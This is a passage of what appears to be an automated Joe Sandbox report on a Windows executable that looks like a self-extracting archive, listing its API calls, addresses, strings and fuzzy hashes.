                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE0B83
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BE0B93
                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,00C03C7C,00000000), ref: 00BE0BB1
                                                            • CloseHandle.KERNEL32(00000000), ref: 00BE0C09
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BE0C1E
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00C03C7C,?,00000000,?,00000800), ref: 00BE0C72
                                                            • GetFileAttributesW.KERNELBASE(?,?,00C03C7C,00000800,?,00000000,?,00000800), ref: 00BE0C9C
                                                            • GetFileAttributesW.KERNEL32(?,?,00C03D44,00000800), ref: 00BE0CD8
                                                              • Part of subcall function 00BE081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BE0836
                                                              • Part of subcall function 00BE081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BDF2D8,Crypt32.dll,00000000,00BDF35C,?,?,00BDF33E,?,?,?), ref: 00BE0858
                                                            • _swprintf.LIBCMT ref: 00BE0D4A
                                                            • _swprintf.LIBCMT ref: 00BE0D96
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                            • AllocConsole.KERNEL32 ref: 00BE0D9E
                                                            • GetCurrentProcessId.KERNEL32 ref: 00BE0DA8
                                                            • AttachConsole.KERNEL32(00000000), ref: 00BE0DAF
                                                            • _wcslen.LIBCMT ref: 00BE0DC4
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00BE0DD5
                                                            • WriteConsoleW.KERNEL32(00000000), ref: 00BE0DDC
                                                            • Sleep.KERNEL32(00002710), ref: 00BE0DE7
                                                            • FreeConsole.KERNEL32 ref: 00BE0DED
                                                            • ExitProcess.KERNEL32 ref: 00BE0DF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                            • API String ID: 1207345701-3298887752
                                                            • Opcode ID: 254a737fc9b5953544806bd5d5b69d44b5fefe4f006df757c3478b00316b5e03
                                                            • Instruction ID: 1d5f78f2747c2e387c1179b0a75dff905fc23683cb8226a9b5ad775a0dee9664
                                                            • Opcode Fuzzy Hash: 254a737fc9b5953544806bd5d5b69d44b5fefe4f006df757c3478b00316b5e03
                                                            • Instruction Fuzzy Hash: 92D172F10183C5ABDB20AF51C849B9FBBECFF85708F51495DF28596290DBB08649CB62

                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BEC744
                                                              • Part of subcall function 00BEB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00BEB3FB
                                                            • _wcslen.LIBCMT ref: 00BECA0A
                                                            • _wcslen.LIBCMT ref: 00BECA13
                                                            • SetWindowTextW.USER32(?,?), ref: 00BECA71
                                                            • _wcslen.LIBCMT ref: 00BECAB3
                                                            • _wcsrchr.LIBVCRUNTIME ref: 00BECBFB
                                                            • GetDlgItem.USER32(?,00000066), ref: 00BECC36
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00BECC46
                                                            • SendMessageW.USER32(00000000,00000143,00000000,00C1A472), ref: 00BECC54
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BECC7F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 2804936435-312220925
                                                            • Opcode ID: 2a929715a9bb2fd2fa40b90e072a4ccaebc39a8947deedca713dc76d06963b0f
                                                            • Instruction ID: ebd33379e16556758be2bc9d2da865a63cef0e688158b60b60f6514b919fb976
                                                            • Opcode Fuzzy Hash: 2a929715a9bb2fd2fa40b90e072a4ccaebc39a8947deedca713dc76d06963b0f
                                                            • Instruction Fuzzy Hash: 53E14172900298AADB25EBA5DD85EEE77FCEF04350F1040E6F609E7150EB749E858B60
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BDDA70
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BDDAAC
                                                              • Part of subcall function 00BDC29A: _wcslen.LIBCMT ref: 00BDC2A2
                                                              • Part of subcall function 00BE05DA: _wcslen.LIBCMT ref: 00BE05E0
                                                              • Part of subcall function 00BE1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BDBAE9,00000000,?,?,?,0001043E), ref: 00BE1BA0
                                                            • _wcslen.LIBCMT ref: 00BDDDE9
                                                            • __fprintf_l.LIBCMT ref: 00BDDF1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                            • API String ID: 566448164-801612888
                                                            • Opcode ID: 766c302f7d7d2b740a2fd0aad65d44c4adf0a00c623608e230cb21d9775ece0a
                                                            • Instruction ID: 17cfb066a2e777f623bf92b449d390818e1a54b3e22eaebe60b5e47440779c59
                                                            • Opcode Fuzzy Hash: 766c302f7d7d2b740a2fd0aad65d44c4adf0a00c623608e230cb21d9775ece0a
                                                            • Instruction Fuzzy Hash: DB32C171A00219ABCF24EF68C842BE9B7E5EF14700F4045ABFA55AB391F7B1D985CB50

                                                            APIs
                                                              • Part of subcall function 00BEB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BEB579
                                                              • Part of subcall function 00BEB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEB58A
                                                              • Part of subcall function 00BEB568: IsDialogMessageW.USER32(0001043E,?), ref: 00BEB59E
                                                              • Part of subcall function 00BEB568: TranslateMessage.USER32(?), ref: 00BEB5AC
                                                              • Part of subcall function 00BEB568: DispatchMessageW.USER32(?), ref: 00BEB5B6
                                                            • GetDlgItem.USER32(00000068,00C2FCB8), ref: 00BED4E8
                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00BEAF07,00000001,?,?,00BEB7B9,00C0506C,00C2FCB8,00C2FCB8,00001000,00000000,00000000), ref: 00BED510
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BED51B
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00C035F4), ref: 00BED529
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BED53F
                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BED559
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BED59D
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BED5AB
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BED5BA
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BED5E1
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00C043F4), ref: 00BED5F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                            • String ID: \
                                                            • API String ID: 3569833718-2967466578
                                                            • Opcode ID: 66aad861f1057fe306fc8649c371e2d041f461c549f2b991ef2082038a4ca7f4
                                                            • Instruction ID: 4db6b7eb70e2ff2230cb6ca0b94ef4b34d276482d03387f6ab9d44dc29100f65
                                                            • Opcode Fuzzy Hash: 66aad861f1057fe306fc8649c371e2d041f461c549f2b991ef2082038a4ca7f4
                                                            • Instruction Fuzzy Hash: 8C31BF71245382AFE301DF20DC4AFAF7FACEB96704F000518FA51961E0DB659A09CBB6

                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00BED7AE
                                                            • ShellExecuteExW.SHELL32(?), ref: 00BED8DE
                                                            • ShowWindow.USER32(?,00000000), ref: 00BED91D
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00BED959
                                                            • CloseHandle.KERNEL32(?), ref: 00BED97F
                                                            • ShowWindow.USER32(?,00000001), ref: 00BED9E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                            • String ID: .exe$.inf
                                                            • API String ID: 36480843-3750412487
                                                            • Opcode ID: 033c758703715c78b054fb8c33d6f28f6136ac189c1ab62f9519af73a4c98d58
                                                            • Instruction ID: 067606b1dfc72e9f85e6300e8dcc4b0dc6bbadf3a28d94c20395484ba8cec279
                                                            • Opcode Fuzzy Hash: 033c758703715c78b054fb8c33d6f28f6136ac189c1ab62f9519af73a4c98d58
                                                            • Instruction Fuzzy Hash: E451C1751043C09AEB309F269C44BAFBBE4EF42744F04089EF9C5971A2E7F58985CB52

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BF5695,00BF5695,?,?,?,00BFABAC,00000001,00000001,2DE85006), ref: 00BFA9B5
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BFABAC,00000001,00000001,2DE85006,?,?,?), ref: 00BFAA3B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BFAB35
                                                            • __freea.LIBCMT ref: 00BFAB42
                                                              • Part of subcall function 00BF8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BFCA2C,00000000,?,00BF6CBE,?,00000008,?,00BF91E0,?,?,?), ref: 00BF8E38
                                                            • __freea.LIBCMT ref: 00BFAB4B
                                                            • __freea.LIBCMT ref: 00BFAB70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0

                                                            Control-flow Graph

                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00BF3C35,?,?,00C32088,00000000,?,00BF3D60,00000004,InitializeCriticalSectionEx,00C06394,InitializeCriticalSectionEx,00000000), ref: 00BF3C03
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: api-ms-
                                                            • API String ID: 3664257935-2084034818

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00BE081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BE0836
                                                              • Part of subcall function 00BE081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BDF2D8,Crypt32.dll,00000000,00BDF35C,?,?,00BDF33E,?,?,?), ref: 00BE0858
                                                            • OleInitialize.OLE32(00000000), ref: 00BEAC2F
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BEAC66
                                                            • SHGetMalloc.SHELL32(00C18438), ref: 00BEAC70
                                                            Similarity
                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                            • String ID: riched20.dll$3Ro
                                                            • API String ID: 3498096277-3613677438

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00BD7760,?,00000005,?,00000011), ref: 00BD995F
                                                            • GetLastError.KERNEL32(?,?,00BD7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BD996C
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00BD7760,?,00000005,?), ref: 00BD99A2
                                                            • GetLastError.KERNEL32(?,?,00BD7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BD99AA
                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00BD7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BD99F9
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:
                                                            • API String ID: 1999340476-0

                                                            Control-flow Graph

                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BEB579
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEB58A
                                                            • IsDialogMessageW.USER32(0001043E,?), ref: 00BEB59E
                                                            • TranslateMessage.USER32(?), ref: 00BEB5AC
                                                            • DispatchMessageW.USER32(?), ref: 00BEB5B6
                                                            Similarity
                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 1266772231-0

                                                            Control-flow Graph

                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000050), ref: 00BEABC2
                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 00BEABF9
                                                              • Part of subcall function 00BE1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BDC116,00000000,.exe,?,?,00000800,?,?,?,00BE8E3C), ref: 00BE1FD1
                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00BEABE9
                                                            Similarity
                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                            • String ID: EDIT
                                                            • API String ID: 4243998846-3080729518

                                                            Control-flow Graph

                                                            APIs
                                                            • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00BEDBF4
                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BEDC30
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: sfxcmd$sfxpar
                                                            • API String ID: 1431749950-3493335439

                                                            Control-flow Graph

                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00BD9795
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00BD97AD
                                                            • GetLastError.KERNEL32 ref: 00BD97DF
                                                            • GetLastError.KERNEL32 ref: 00BD97FE
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00BF3F73,00000000,00000000,?,00BFACDB,00BF3F73,00000000,00000000,00000000,?,00BFAED8,00000006,FlsSetValue), ref: 00BFAD66
                                                            • GetLastError.KERNEL32(?,00BFACDB,00BF3F73,00000000,00000000,00000000,?,00BFAED8,00000006,FlsSetValue,00C07970,FlsSetValue,00000000,00000364,?,00BF98B7), ref: 00BFAD72
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BFACDB,00BF3F73,00000000,00000000,00000000,?,00BFAED8,00000006,FlsSetValue,00C07970,FlsSetValue,00000000), ref: 00BFAD80
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00BDD343,00000001,?,?,?,00000000,00BE551D,?,?,?), ref: 00BD9F9E
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00BE551D,?,?,?,?,?,00BE4FC7,?), ref: 00BD9FE5
                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00BDD343,00000001,?,?), ref: 00BDA011
                                                            Similarity
                                                            • API ID: FileWrite$Handle
                                                            • String ID:
                                                            • API String ID: 4209713984-0
                                                            • Opcode ID: baeb3fb42793af7c99a452658291ff43606dcbcf09052294941814d31751898a
                                                            • Instruction ID: 8d2201a14ed2c33487052271bcd64103da1abdf266c41bb49ed8f011e98b0101
                                                            • Opcode Fuzzy Hash: baeb3fb42793af7c99a452658291ff43606dcbcf09052294941814d31751898a
                                                            • Instruction Fuzzy Hash: F631CE71208345AFDB14CF20D858BAEB7E9EF84714F04495AF9819B390D775AE48CBA2
                                                            APIs
                                                              • Part of subcall function 00BDC27E: _wcslen.LIBCMT ref: 00BDC284
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA2D9
                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA30C
                                                            • GetLastError.KERNEL32(?,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA329
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                            • String ID:
                                                            • API String ID: 2260680371-0
                                                            • Opcode ID: ab3fb12a2c4930e9229645f2c92d10ba41ce2c5a3c945c646d67f288f84ec4ae
                                                            • Instruction ID: e168f3a9dbd7a56998fb90dceed6d309a8bcb16b76b0d8df2c9ed364d88328e4
                                                            • Opcode Fuzzy Hash: ab3fb12a2c4930e9229645f2c92d10ba41ce2c5a3c945c646d67f288f84ec4ae
                                                            • Instruction Fuzzy Hash: 4C01B131200250AAEF21AB754C49BEDB6CDDF0A794F044497F902E6381F768CB81C6BA
                                                            APIs
                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00BFB8B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: bb31967d30534c1d89315a1b7489819b8ad190639e787901a273432f42d4c610
                                                            • Instruction ID: 514f797f0bd3341be92b3cf57143b549b9f2559a6768d315b3da95f09e2195c7
                                                            • Opcode Fuzzy Hash: bb31967d30534c1d89315a1b7489819b8ad190639e787901a273432f42d4c610
                                                            • Instruction Fuzzy Hash: DE41F87050428C9ADF218E68CC84FFABBEDDB45304F1444EDE79A87142D375AA49CF60
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00BFAFDD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 2568140703-3893581201
                                                            • Opcode ID: c14a24b0af036ee519914232905b7f7f0c380393261c123cc2f8dbf794720c16
                                                            • Instruction ID: 76abc2ae849a2cc4de9a72f02242bd7ae21371d6755be633905d3905eef62987
                                                            • Opcode Fuzzy Hash: c14a24b0af036ee519914232905b7f7f0c380393261c123cc2f8dbf794720c16
                                                            • Instruction Fuzzy Hash: EA01087254421DBBCF069F90DC06EEE7FA6EF08750F054294FE1866161CA329A31EB91
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00BFA56F), ref: 00BFAF55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3084827643
                                                            • Opcode ID: 8fe5a5d60a90a79a4acf24bd26e61c3f2274d658ae642ae4a63f547e347b0211
                                                            • Instruction ID: 7b1fdf182cec26f40b5eb157401d305f1b7eb45ec19cf9e2e3a813d02e5bf6ef
                                                            • Opcode Fuzzy Hash: 8fe5a5d60a90a79a4acf24bd26e61c3f2274d658ae642ae4a63f547e347b0211
                                                            • Instruction Fuzzy Hash: 4BF0E971A4521CBFCF0A6F55CC06EAEBFA5EF08711B4141A4FD089B260DA315E10D7D5
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: FlsAlloc
                                                            • API String ID: 2773662609-671089009
